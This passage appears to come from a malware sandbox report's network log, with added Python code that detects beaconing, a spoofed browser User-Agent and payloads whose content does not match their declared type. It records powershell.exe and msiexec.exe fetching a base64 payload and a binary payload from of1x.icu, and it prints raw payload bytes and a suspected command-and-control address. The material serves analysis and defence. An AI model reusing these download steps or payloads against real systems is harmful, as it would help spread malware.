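TS_RE = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(\d+) \w+$")
WELL_KNOWN = {53, 80, 443}        # assumption: ports not treated as "non-standard"
EPOCH = datetime(1970, 1, 1)

def parse_ts(text):
    """Report timestamps carry 9 fractional digits, more than strptime's %f
    accepts, so split the fraction off and add it back as a float."""
    m = TS_RE.match(text)
    if not m:
        raise ValueError(f"bad timestamp: {text!r}")
    base = datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S")
    frac = int(m.group(2).ljust(9, "0")[:9]) / 1e9
    return (base - EPOCH).total_seconds() + frac

def is_private(ip):
    """Minimal RFC 1918 test; the sandbox client sits in 192.168.0.0/16."""
    o = [int(x) for x in ip.split(".")]
    return o[0] == 10 or (o[0] == 172 and 16 <= o[1] <= 31) or (o[0] == 192 and o[1] == 168)

def connection_starts(rows):
    """Map (server_ip, server_port) -> sorted first-packet times, one per
    client source port, i.e. one per TCP connection."""
    first_seen = {}
    for line in rows.strip().splitlines():
        ts, sport, dport, src, dst = line.split("|")
        sport, dport, t = int(sport), int(dport), parse_ts(ts)
        if is_private(src) and not is_private(dst):
            key = (dst, dport, sport)          # client -> server packet
        elif is_private(dst) and not is_private(src):
            key = (src, sport, dport)          # server -> client packet
        else:
            continue                           # internal or external-only traffic
        first_seen[key] = min(t, first_seen.get(key, t))
    starts = defaultdict(list)
    for (server, port, _client_port), t in first_seen.items():
        starts[(server, port)].append(t)
    return {k: sorted(v) for k, v in starts.items()}

def find_beacons(rows, min_connections=3, max_cv=0.1):
    """Flag (server, port) pairs whose connection inter-arrival gaps are
    nearly constant (coefficient of variation <= max_cv) on a port outside
    WELL_KNOWN. Pairs with too few connections are not scored."""
    findings = {}
    for (server, port), times in connection_starts(rows).items():
        if len(times) < max(2, min_connections):
            continue
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else float("inf")
        findings[(server, port)] = {
            "connections": len(times),
            "mean_interval_s": round(mean, 3),
            "cv": round(cv, 4),
            "beacon": cv <= max_cv and port not in WELL_KNOWN,
        }
    return findings

if __name__ == "__main__":
    for (server, port), f in find_beacons(PACKET_ROWS).items():
        print(f"{server}:{port} -> {f}")
```

On the rows above this reports 154.216.18.216:2404 with four connections, a mean gap of about 23.05 s and a coefficient of variation well under 0.01, which is the shape a hand-coded keepalive produces; the 443 flow has a single connection and is never scored. On a real capture the same logic should run per (client, server, port) and over a longer window, since a 0.1 cutoff with three samples will also catch some legitimate pollers.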
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 12, 2024 07:54:09.270737886 CET | 53760 | 53 | 192.168.2.7 | 1.1.1.1
Dec 12, 2024 07:54:09.667146921 CET | 53 | 53760 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 12, 2024 07:54:09.270737886 CET | 192.168.2.7 | 1.1.1.1 | 0x1b41 | Standard query (0) | of1x.icu | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 12, 2024 07:54:09.667146921 CET | 1.1.1.1 | 192.168.2.7 | 0x1b41 | No error (0) | of1x.icu | | 172.67.216.143 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 07:54:09.667146921 CET | 1.1.1.1 | 192.168.2.7 | 0x1b41 | No error (0) | of1x.icu | | 104.21.86.72 | A (IP address) | IN (0x0001) | false
                                          • of1x.icu
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49699 | 172.67.216.143 | 443 | 2356 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-12 06:54:10 UTC | 178 | OUT | GET /rxHEjEYE/Nickelization.csv HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                          Host: of1x.icu
                                          Connection: Keep-Alive
2024-12-12 06:54:11 UTC | 836 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 12 Dec 2024 06:54:11 GMT
                                          Content-Type: text/csv
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Cache-Control: max-age=14400
                                          CF-Cache-Status: MISS
                                          Last-Modified: Thu, 12 Dec 2024 06:54:11 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FYd942qCYKMa6r28cGA0i6MZnIsEddj0fBbU7y4Lo6Uy7eIbUtEKj%2BxYQ4O5vNdc8OL9TIJlPQ8lKKWODfPrLcDvVlX9IxgA7QDrbtP3bGDKmfdrBoDgJXY3kQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8f0bcd37dad3c3ee-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1610&rtt_var=618&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=792&delivery_rate=1813664&cwnd=247&unsent_bytes=0&cid=1fffcf3afcbbc48e&ts=677&x=0"
                                          2024-12-12 06:54:11 UTC533INData Raw: 33 38 65 38 0d 0a 36 77 4b 74 71 48 45 42 6d 37 75 76 35 52 63 41 36 77 49 6c 6f 48 45 42 6d 77 4e 63 4a 41 52 78 41 5a 76 72 41 72 38 45 75 56 74 46 56 73 70 78 41 5a 74 78 41 5a 75 42 77 64 4d 73 79 42 44 72 41 76 4a 37 63 51 47 62 67 66 45 75 63 68 37 62 63 51 47 62 63 51 47 62 63 51 47 62 36 77 4b 62 68 4c 72 66 55 50 72 71 36 77 49 6d 53 4f 73 43 62 78 31 78 41 5a 74 78 41 5a 73 78 79 75 73 43 34 37 6c 78 41 5a 75 4a 46 41 74 78 41 5a 76 72 41 73 78 49 30 65 4a 78 41 5a 76 72 41 72 74 79 67 38 45 45 63 51 47 62 63 51 47 62 67 66 6b 52 54 61 77 43 66 4d 31 78 41 5a 74 78 41 5a 75 4c 52 43 51 45 36 77 4a 48 36 33 45 42 6d 34 6e 44 63 51 47 62 36 77 4b 61 6d 34 48 44 51 51 39 4a 41 48 45 42 6d 33 45 42 6d 37 72 75 34 39 76 5a 63 51 47 62 63 51 47 62 67
                                          Data Ascii: 38e86wKtqHEBm7uv5RcA6wIloHEBmwNcJARxAZvrAr8EuVtFVspxAZtxAZuBwdMsyBDrAvJ7cQGbgfEuch7bcQGbcQGbcQGb6wKbhLrfUPrq6wImSOsCbx1xAZtxAZsxyusC47lxAZuJFAtxAZvrAsxI0eJxAZvrArtyg8EEcQGbcQGbgfkRTawCfM1xAZtxAZuLRCQE6wJH63EBm4nDcQGb6wKam4HDQQ9JAHEBm3EBm7ru49vZcQGbcQGbg
                                          2024-12-12 06:54:11 UTC1369INData Raw: 42 6d 34 6e 72 63 51 47 62 36 77 49 41 39 59 6d 37 42 41 45 41 41 48 45 42 6d 2b 73 43 65 68 53 42 77 77 51 42 41 41 42 78 41 5a 74 78 41 5a 74 54 63 51 47 62 63 51 47 62 61 76 39 78 41 5a 74 78 41 5a 75 44 77 67 58 72 41 76 72 75 36 77 49 36 4b 7a 48 32 63 51 47 62 36 77 4b 65 42 44 48 4a 36 77 4a 31 37 4f 73 43 54 76 4f 4c 47 75 73 43 53 57 4c 72 41 72 53 71 51 65 73 43 70 73 66 72 41 75 62 38 4f 52 77 4b 64 66 4a 78 41 5a 76 72 41 6d 66 65 52 75 73 43 44 49 62 72 41 6a 74 4c 67 48 77 4b 2b 37 68 31 32 33 45 42 6d 33 45 42 6d 34 74 45 43 76 7a 72 41 67 76 4c 36 77 4b 55 5a 69 6e 77 36 77 4b 32 42 65 73 43 54 37 48 2f 30 6e 45 42 6d 33 45 42 6d 37 71 59 2f 41 51 41 63 51 47 62 36 77 49 55 65 54 48 41 63 51 47 62 63 51 47 62 69 33 77 6b 44 48 45 42 6d 2b
                                          Data Ascii: Bm4nrcQGb6wIA9Ym7BAEAAHEBm+sCehSBwwQBAABxAZtxAZtTcQGbcQGbav9xAZtxAZuDwgXrAvru6wI6KzH2cQGb6wKeBDHJ6wJ17OsCTvOLGusCSWLrArSqQesCpsfrAub8ORwKdfJxAZvrAmfeRusCDIbrAjtLgHwK+7h123EBm3EBm4tECvzrAgvL6wKUZinw6wK2BesCT7H/0nEBm3EBm7qY/AQAcQGb6wIUeTHAcQGbcQGbi3wkDHEBm+
                                          2024-12-12 06:54:11 UTC1369INData Raw: 58 6a 58 61 48 47 77 47 54 4a 31 4c 58 4f 4f 4a 4c 59 2b 76 4f 63 45 77 49 62 57 67 53 47 70 77 6f 37 69 4b 41 77 6a 74 71 33 54 53 64 63 43 59 47 44 33 44 54 43 6d 4e 43 51 32 43 71 55 75 55 6b 43 56 61 6a 38 74 37 4f 73 64 61 47 2f 2f 44 44 4d 34 47 63 69 6d 71 5a 4f 44 7a 62 42 4e 4b 49 78 6a 49 47 36 6c 50 35 52 53 6f 56 64 41 55 71 46 58 51 46 4b 68 56 30 42 53 6f 56 64 41 55 71 46 58 51 46 4b 68 56 30 42 53 6f 56 64 43 4c 63 69 4c 73 32 79 5a 32 39 4d 49 48 77 75 4f 70 38 64 6d 52 67 53 61 79 31 50 6f 53 69 4c 35 35 68 37 31 57 70 61 78 56 57 5a 45 77 56 64 41 55 49 64 44 49 46 71 68 56 68 36 76 6f 52 61 76 55 4b 61 4c 48 35 2f 55 6e 55 65 50 75 71 6d 63 67 4b 61 4b 6b 78 39 35 62 55 65 50 4e 6d 7a 65 63 2f 73 6c 5a 38 71 46 72 54 5a 42 68 4c 63 6a
                                          Data Ascii: XjXaHGwGTJ1LXOOJLY+vOcEwIbWgSGpwo7iKAwjtq3TSdcCYGD3DTCmNCQ2CqUuUkCVaj8t7OsdaG//DDM4GcimqZODzbBNKIxjIG6lP5RSoVdAUqFXQFKhV0BSoVdAUqFXQFKhV0BSoVdCLciLs2yZ29MIHwuOp8dmRgSay1PoSiL55h71WpaxVWZEwVdAUIdDIFqhVh6voRavUKaLH5/UnUePuqmcgKaKkx95bUePNmzec/slZ8qFrTZBhLcj
                                          2024-12-12 06:54:11 UTC1369INData Raw: 35 56 66 39 65 4c 6d 6c 39 51 6e 6e 7a 49 46 6b 35 32 76 32 48 5a 67 44 36 49 2b 4d 2f 54 4a 42 33 5a 36 4f 57 62 6e 4c 4f 72 69 32 6f 44 45 70 4c 71 78 4b 56 35 36 74 5a 71 6a 6b 2b 52 4a 6f 6b 37 47 51 7a 66 45 65 76 34 38 4c 2f 65 5a 36 33 43 53 47 4d 44 6b 4d 56 36 66 4e 71 6e 65 36 53 6b 4d 5a 39 4f 6a 44 37 76 4c 51 68 77 71 50 31 67 35 56 67 79 4e 72 74 47 73 64 63 55 4d 56 37 31 66 32 37 46 45 51 68 49 63 6e 53 58 68 30 52 53 6f 37 41 52 67 4c 62 68 52 35 56 41 4c 66 36 6b 70 6c 42 4b 2f 61 2f 52 52 35 55 62 51 50 65 56 6b 68 4f 7a 33 46 37 4f 4b 71 63 78 39 44 5a 54 77 68 57 36 4c 33 69 4a 43 38 5a 2f 62 76 30 45 34 43 59 2b 44 53 59 2b 76 53 6a 46 6f 63 43 35 4c 76 75 34 30 6d 77 68 6c 52 51 67 6c 59 6b 62 73 63 4c 45 62 71 55 50 4f 46 4b 68 56
                                          Data Ascii: 5Vf9eLml9QnnzIFk52v2HZgD6I+M/TJB3Z6OWbnLOri2oDEpLqxKV56tZqjk+RJok7GQzfEev48L/eZ63CSGMDkMV6fNqne6SkMZ9OjD7vLQhwqP1g5VgyNrtGsdcUMV71f27FEQhIcnSXh0RSo7ARgLbhR5VALf6kplBK/a/RR5UbQPeVkhOz3F7OKqcx9DZTwhW6L3iJC8Z/bv0E4CY+DSY+vSjFocC5Lvu40mwhlRQglYkbscLEbqUPOFKhV
                                          2024-12-12 06:54:11 UTC1369INData Raw: 7a 43 6c 7a 4e 35 74 73 46 71 47 76 4a 2b 41 6e 4c 43 78 69 71 5a 7a 2f 35 71 2f 65 64 39 77 66 45 59 41 50 30 32 31 7a 36 65 32 48 65 2f 54 50 49 43 50 66 49 44 48 50 79 38 4c 4f 6e 6a 46 62 54 44 78 53 34 4f 5a 6f 58 62 6e 37 39 70 2b 6a 46 42 56 55 64 50 30 53 53 64 65 79 38 2b 46 65 39 58 4c 6d 50 6a 36 69 44 37 69 53 39 6d 33 72 33 68 6e 78 32 54 30 52 53 6f 41 32 34 38 55 76 69 70 6c 56 34 30 52 30 30 78 31 42 59 50 51 31 37 50 6e 61 34 35 34 56 55 6e 75 4a 47 4e 67 38 68 36 6f 46 4f 38 76 2f 6d 78 50 36 73 6c 71 66 69 57 4c 33 5a 49 73 2f 56 4d 4d 45 6d 5a 43 71 39 42 4c 74 65 58 6a 6b 59 53 76 6f 47 50 6a 74 51 69 52 35 4f 2f 76 4a 56 71 2b 78 75 61 48 64 7a 69 7a 6b 6a 6b 4c 32 2f 4d 47 47 32 64 51 58 50 35 6f 59 54 56 4e 47 4a 75 4f 39 6c 6d 6a
                                          Data Ascii: zClzN5tsFqGvJ+AnLCxiqZz/5q/ed9wfEYAP021z6e2He/TPICPfIDHPy8LOnjFbTDxS4OZoXbn79p+jFBVUdP0SSdey8+Fe9XLmPj6iD7iS9m3r3hnx2T0RSoA248UviplV40R00x1BYPQ17Pna454VUnuJGNg8h6oFO8v/mxP6slqfiWL3ZIs/VMMEmZCq9BLteXjkYSvoGPjtQiR5O/vJVq+xuaHdzizkjkL2/MGG2dQXP5oYTVNGJuO9lmj
                                          2024-12-12 06:54:11 UTC1369INData Raw: 72 34 61 48 79 70 31 54 50 76 61 68 56 30 42 53 6f 56 64 41 55 71 46 58 51 46 4b 68 56 30 42 53 6f 56 64 41 55 71 46 58 51 46 4b 68 56 30 42 51 75 4e 55 4b 43 42 31 62 61 62 70 38 5a 65 2b 66 41 35 63 69 74 41 74 78 4e 68 71 6c 56 30 4b 38 66 79 58 4c 61 2b 2b 34 5a 69 70 6c 74 55 65 66 42 69 53 4a 6f 4b 61 59 42 36 46 73 36 55 65 66 5a 36 75 41 2f 2f 38 6c 5a 38 36 46 4b 54 5a 42 34 4c 2f 65 74 41 5a 66 62 63 55 77 2b 45 78 47 6a 4c 37 42 68 36 73 6b 59 6e 33 76 77 38 30 4c 49 69 6a 43 39 49 42 7a 66 44 37 37 4f 64 75 75 64 4d 30 57 76 5a 30 45 62 6e 4e 5a 4e 6b 33 2f 57 45 58 67 4f 39 32 30 74 54 79 6d 2b 4a 61 34 34 58 56 48 58 6e 4e 67 36 37 43 6d 2b 4d 58 70 55 36 34 65 72 57 57 6e 68 79 53 6d 69 39 73 31 72 33 56 48 6a 4b 67 30 69 51 53 46 71 33 6a
                                          Data Ascii: r4aHyp1TPvahV0BSoVdAUqFXQFKhV0BSoVdAUqFXQFKhV0BQuNUKCB1babp8Ze+fA5citAtxNhqlV0K8fyXLa++4ZipltUefBiSJoKaYB6Fs6UefZ6uA//8lZ86FKTZB4L/etAZfbcUw+ExGjL7Bh6skYn3vw80LIijC9IBzfD77OduudM0WvZ0EbnNZNk3/WEXgO920tTym+Ja44XVHXnNg67Cm+MXpU64erWWnhySmi9s1r3VHjKg0iQSFq3j
                                          2024-12-12 06:54:11 UTC1369INData Raw: 46 4b 68 56 30 42 53 6f 56 64 41 55 4b 70 70 4f 6c 30 77 43 43 43 4d 70 34 4b 34 57 71 46 57 77 69 46 50 6a 55 5a 48 57 56 39 41 55 72 66 4c 67 5a 66 37 72 74 67 6d 5a 33 31 48 36 53 4e 6f 33 70 69 6d 54 4b 34 57 50 74 46 48 69 4b 55 75 68 72 50 72 4a 57 66 61 70 5a 30 30 74 63 53 54 48 67 51 54 66 48 2b 53 6a 67 66 77 30 49 43 53 49 62 6b 36 45 6a 72 73 36 78 74 38 64 36 6b 4b 63 4c 4e 76 58 38 45 75 74 32 32 6b 6b 34 6a 4e 52 36 2f 37 39 69 70 46 69 43 2b 75 68 31 6c 66 51 46 4e 30 41 68 71 6f 2f 70 78 78 49 4b 5a 50 39 73 38 2f 4d 55 66 70 73 7a 65 54 69 2f 38 6c 5a 38 36 46 69 54 5a 46 6e 4a 63 30 4b 69 73 68 74 30 4c 72 71 4b 7a 68 62 47 67 6f 6e 61 6e 6c 34 4f 78 4c 31 61 69 2b 77 6b 2f 48 51 68 5a 4e 59 56 66 6a 51 74 4a 2b 50 66 61 73 2f 69 5a 36
                                          Data Ascii: FKhV0BSoVdAUKppOl0wCCCMp4K4WqFWwiFPjUZHWV9AUrfLgZf7rtgmZ31H6SNo3pimTK4WPtFHiKUuhrPrJWfapZ00tcSTHgQTfH+Sjgfw0ICSIbk6Ejrs6xt8d6kKcLNvX8Eut22kk4jNR6/79ipFiC+uh1lfQFN0Ahqo/pxxIKZP9s8/MUfpszeTi/8lZ86FiTZFnJc0Kisht0LrqKzhbGgonanl4OxL1ai+wk/HQhZNYVfjQtJ+Pfas/iZ6
                                          2024-12-12 06:54:11 UTC1369INData Raw: 69 37 67 5a 46 44 36 67 6c 7a 4b 58 59 57 77 65 31 5a 4c 74 44 63 57 2b 6e 6b 69 78 6a 6e 43 32 51 70 6b 2b 76 45 4c 4a 4c 6d 4a 47 32 4d 6d 59 47 71 72 49 65 44 56 46 71 68 56 62 71 44 6c 79 38 73 62 71 57 57 6c 46 4b 68 56 30 42 53 6f 56 64 41 55 71 46 58 51 46 4b 68 56 30 42 53 6f 56 64 41 55 71 46 58 51 46 4b 68 56 30 4a 63 77 6d 47 72 4a 44 39 71 69 49 69 6d 6a 2b 48 61 4f 49 6f 65 72 77 44 6a 78 6b 69 6d 69 61 42 33 4b 56 46 48 6a 57 76 77 53 4d 53 6d 53 44 69 66 57 43 49 61 49 49 62 50 52 4b 6a 56 74 45 32 47 7a 49 69 73 54 7a 42 6b 6c 44 63 65 6c 49 42 36 38 4d 6d 6b 52 65 64 54 71 36 55 61 65 6e 57 49 72 77 4a 36 71 67 75 51 69 6b 31 57 53 57 53 73 6e 46 37 53 43 4b 72 34 58 35 43 79 69 6a 6e 4b 52 68 6f 2b 56 52 6f 37 2f 72 71 4c 55 46 6b 2b 6f
                                          Data Ascii: i7gZFD6glzKXYWwe1ZLtDcW+nkixjnC2Qpk+vELJLmJG2MmYGqrIeDVFqhVbqDly8sbqWWlFKhV0BSoVdAUqFXQFKhV0BSoVdAUqFXQFKhV0JcwmGrJD9qiIimj+HaOIoerwDjxkimiaB3KVFHjWvwSMSmSDifWCIaIIbPRKjVtE2GzIisTzBklDcelIB68MmkRedTq6UaenWIrwJ6qguQik1WSWSsnF7SCKr4X5CyijnKRho+VRo7/rqLUFk+o
                                          2024-12-12 06:54:11 UTC1369INData Raw: 77 39 6c 6e 4b 36 6a 74 2f 54 6e 37 6e 51 46 4b 68 56 30 42 53 6f 56 64 41 55 71 46 58 51 46 4b 68 56 30 42 53 6f 56 64 41 55 71 46 58 51 46 4b 68 56 54 6c 6a 53 59 69 59 70 45 6a 37 72 61 70 74 53 72 36 76 36 37 2b 6b 6c 58 47 46 52 45 49 77 51 48 4f 69 76 31 4f 51 77 50 55 5a 4a 5a 43 6c 52 39 4f 70 32 50 4c 79 64 4e 53 2f 53 46 4b 67 45 61 55 37 7a 4c 37 65 56 57 57 61 6e 64 51 37 55 49 65 7a 75 62 6c 53 56 51 66 2f 2f 4e 4f 33 63 30 54 68 50 45 54 62 51 2f 31 45 69 6d 66 6c 36 42 63 45 53 6b 71 77 68 77 56 61 38 48 4e 76 6f 51 64 2b 35 56 37 56 46 72 74 54 49 49 33 44 6f 47 66 6c 75 6b 54 46 74 38 64 77 72 47 36 6d 52 7a 78 53 6f 56 64 41 55 71 46 58 51 46 4b 68 56 30 42 53 6f 56 64 41 55 71 46 58 51 46 4b 68 56 30 42 53 6f 56 64 43 4f 55 58 52 61 6e
                                          Data Ascii: w9lnK6jt/Tn7nQFKhV0BSoVdAUqFXQFKhV0BSoVdAUqFXQFKhVTljSYiYpEj7raptSr6v67+klXGFREIwQHOiv1OQwPUZJZClR9Op2PLydNS/SFKgEaU7zL7eVWWandQ7UIezublSVQf//NO3c0ThPETbQ/1Eimfl6BcESkqwhwVa8HNvoQd+5V7VFrtTII3DoGflukTFt8dwrG6mRzxSoVdAUqFXQFKhV0BSoVdAUqFXQFKhV0BSoVdCOUXRan
                                          2024-12-12 06:54:11 UTC1369INData Raw: 30 64 55 39 53 6e 73 4a 4d 7a 5a 78 2f 67 49 6d 66 4e 58 33 52 46 4b 6a 63 69 42 48 2b 36 35 73 43 57 55 4a 52 34 6f 43 43 54 62 6f 70 75 37 50 55 78 4f 79 41 69 43 47 31 32 53 51 31 62 42 35 6b 71 68 59 37 38 4a 66 61 49 2b 43 64 6b 6e 43 6d 42 73 4d 53 6d 6a 58 6d 75 37 6c 6c 54 67 76 4f 50 54 35 2b 42 73 58 42 56 49 76 49 44 50 54 75 61 67 45 6a 67 31 42 4b 6f 32 6c 53 4e 46 31 79 2f 6e 35 6c 58 69 79 64 69 4a 42 66 43 78 64 58 70 46 66 51 46 4b 69 5a 37 72 37 36 78 2f 71 52 48 46 39 39 44 71 78 58 32 49 76 2b 77 6b 50 63 48 59 64 70 64 78 6e 32 53 72 50 4f 66 56 77 4f 56 63 77 55 4d 31 74 6c 6e 51 59 43 6d 6e 37 42 4c 6b 31 62 4a 45 35 68 57 45 50 35 37 4d 5a 4d 58 37 4e 52 35 57 69 6c 75 45 30 70 76 46 47 52 55 36 68 52 31 51 51 76 57 67 30 70 76 46
                                          Data Ascii: 0dU9SnsJMzZx/gImfNX3RFKjciBH+65sCWUJR4oCCTbopu7PUxOyAiCG12SQ1bB5kqhY78JfaI+CdknCmBsMSmjXmu7llTgvOPT5+BsXBVIvIDPTuagEjg1BKo2lSNF1y/n5lXiydiJBfCxdXpFfQFKiZ7r76x/qRHF99DqxX2Iv+wkPcHYdpdxn2SrPOfVwOVcwUM1tlnQYCmn7BLk1bJE5hWEP57MZMX7NR5WiluE0pvFGRU6hR1QQvWg0pvF
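Two things in this session deserve a check that the report leaves to the reader. The client process is powershell.exe (and, in the session that follows, msiexec.exe), yet the User-Agent is a Firefox one. And because the response is chunked, the first bytes of "Data Raw" are a hex chunk-size line (38e8 here, 38d6 in the next session) rather than payload; what follows the chunk header in this session is base64-looking text served as text/csv, while the next session's body is opaque binary. Added example, not code from the report or from the sample: the Python below strips the chunk framing, classifies the first payload bytes, and reports the process/User-Agent and Content-Type mismatches. The byte samples are the first 30 bytes of each response body as shown in the Data Raw rows; the process lists, the base64/binary heuristics and the thresholds are assumptions made for this example.

```python
"""Framing and content-type checks for the two HTTP transfers in this
report.  Added example (not Joe Sandbox code and not from the sample);
the byte samples are hand-transcribed from the first "Data Raw" row of
each session, so they are constructed inputs, not a live capture."""
import math
import re
import string

# Constructed samples: the first 30 bytes of each chunked response body.
SESSION0_BODY = bytes.fromhex(   # powershell.exe, declared text/csv
    "33 38 65 38 0d 0a 36 77 4b 74 71 48 45 42 6d 37 75 76 35 52 63 41 36 77 49 6c 6f 48 45 42"
)
SESSION1_BODY = bytes.fromhex(   # msiexec.exe, declared application/octet-stream
    "33 38 64 36 0d 0a f0 aa 43 91 24 8b b0 7d 25 23 66 ab e6 1a 64 4e ac 04 54 df 14 53 40 1e"
)
FIREFOX_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"

# Assumptions for this example: which binaries legitimately send a browser
# UA, and which script/installer hosts should never pull opaque binaries.
BROWSER_PROCS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
SCRIPT_HOSTS = {"powershell.exe", "msiexec.exe", "wscript.exe", "cscript.exe"}
B64_BYTES = set((string.ascii_letters + string.digits + "+/=\r\n").encode())
CHUNK_RE = re.compile(rb"^([0-9A-Fa-f]+)(?:;[^\r\n]*)?\r\n")   # size[;ext]CRLF

def parse_chunk_header(body):
    """Return (declared size, payload offset) of the first chunk, or raise
    if the body does not start with a valid chunk-size line."""
    m = CHUNK_RE.match(body)
    if not m:
        raise ValueError("not a chunked body")
    return int(m.group(1), 16), m.end()

def entropy(data):
    """Shannon entropy in bits per byte."""
    if not data:
        return 0.0
    counts = {}
    for b in data:
        counts[b] = counts.get(b, 0) + 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def classify_payload(payload):
    """'base64' when every byte is in the base64 alphabet (a heuristic: a
    CSV with no commas at all would also match), 'binary' when more than a
    quarter of the bytes fall outside printable ASCII, else 'text'."""
    if not payload:
        return "text"
    if all(b in B64_BYTES for b in payload):
        return "base64"
    nonprint = sum(1 for b in payload if not (0x20 <= b < 0x7F or b in b"\t\r\n"))
    return "binary" if nonprint / len(payload) > 0.25 else "text"

def check_session(process, user_agent, content_type, transfer_encoding, body):
    """Findings for one HTTP session, as a list of strings (empty = clean)."""
    findings = []
    exe = process.rsplit("\\", 1)[-1].lower()
    if user_agent.lower().startswith("mozilla/") and exe not in BROWSER_PROCS:
        findings.append(f"browser User-Agent sent by non-browser process {exe}")
    payload = body
    if transfer_encoding.lower() == "chunked":
        size, off = parse_chunk_header(body)
        payload = body[off:off + size]        # strip the chunk framing
    kind = classify_payload(payload)
    if content_type.startswith("text/") and kind != "text":
        findings.append(f"declared {content_type} but body looks like {kind}")
    if kind == "binary" and exe in SCRIPT_HOSTS:
        findings.append(f"{exe} fetched a binary payload ({entropy(payload):.2f} bits/byte)")
    return findings

if __name__ == "__main__":
    print(check_session(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                        FIREFOX_UA, "text/csv", "chunked", SESSION0_BODY))
    print(check_session(r"C:\Windows\SysWOW64\msiexec.exe",
                        FIREFOX_UA, "application/octet-stream", "chunked", SESSION1_BODY))
```

For this session the checks return a User-Agent/process mismatch and a text/csv body that is really base64; for the msiexec.exe session they return the same User-Agent mismatch plus a script host pulling an opaque binary. Keying on the process name alone is weak (a renamed binary defeats it), so in production the process identity should come from the image path and signature rather than the basename used here.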


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49776 | 172.67.216.143 | 443 | 7768 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-12 06:54:52 UTC | 193 | OUT | GET /NJLIlJfi/OrlcxpGmYPgSWGORxagHTwaJ166.bin HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                          Host: of1x.icu
                                          Cache-Control: no-cache
2024-12-12 06:54:52 UTC | 854 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 12 Dec 2024 06:54:52 GMT
                                          Content-Type: application/octet-stream
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Cache-Control: max-age=14400
                                          CF-Cache-Status: MISS
                                          Last-Modified: Thu, 12 Dec 2024 06:54:52 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GwM5dIZp2IuanHdLwHViVBoW1FdIPxSPksIBC%2Fj%2BDY33nLFqCZsrHd7sjO2HEP3b2P5HuyQl2atGDX6mgkg5vDpnnyHEPSG36yPGCiocOiIZPvPMn%2BFAs3jR5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8f0bce3938f8f797-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1634&min_rtt=1629&rtt_var=621&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=831&delivery_rate=1748502&cwnd=151&unsent_bytes=0&cid=090af66b369c0238&ts=684&x=0"
                                          2024-12-12 06:54:52 UTC515INData Raw: 33 38 64 36 0d 0a f0 aa 43 91 24 8b b0 7d 25 23 66 ab e6 1a 64 4e ac 04 54 df 14 53 40 1e aa ee 01 b7 16 52 d2 50 16 1a 21 22 31 44 73 3e f3 40 57 cb cb 62 a6 77 54 b3 a1 4a f6 cf 3c d0 97 db 7c b1 9b 4a ce 3a 5b 4e 25 90 32 a3 57 f7 64 ab 8a 0e 68 f0 69 c4 53 b8 a2 47 74 62 2f ad 0e 89 6c 72 7a 4e 4c 50 e7 4c 47 23 e7 f4 5a 40 09 99 6b 94 c9 e1 c6 61 0b 67 70 c0 52 9f ea a8 9e 9e 46 c4 b9 73 85 fd 10 1e 01 12 4b 04 66 e6 6c a6 45 08 67 69 67 9f 64 25 ac f9 4a 4c 90 34 bd 3e 81 f3 ac 5d 04 62 27 11 42 75 d2 11 45 1c 88 9d 8f a5 d5 17 14 e8 f7 cc 24 e0 0e d5 d5 88 b1 5c 5f cb f7 80 5a 72 b3 0f f3 f4 76 3a 99 0e c4 4d 0b bf 22 48 77 da 87 6f 66 ac 55 a3 18 56 e0 80 69 1f 54 aa 6b 91 71 7a ad 3a 2c 51 b8 8f dc 8b ae 11 14 14 05 52 a2 d4 d0 b7 7e 87 c2 ab 6b
                                          Data Ascii: 38d6C$}%#fdNTS@RP!"1Ds>@WbwTJ<|J:[N%2WdhiSGtb/lrzNLPLG#Z@kagpRFsKflEgigd%JL4>]b'BuE$\_Zrv:M"HwofUViTkqz:,QR~k
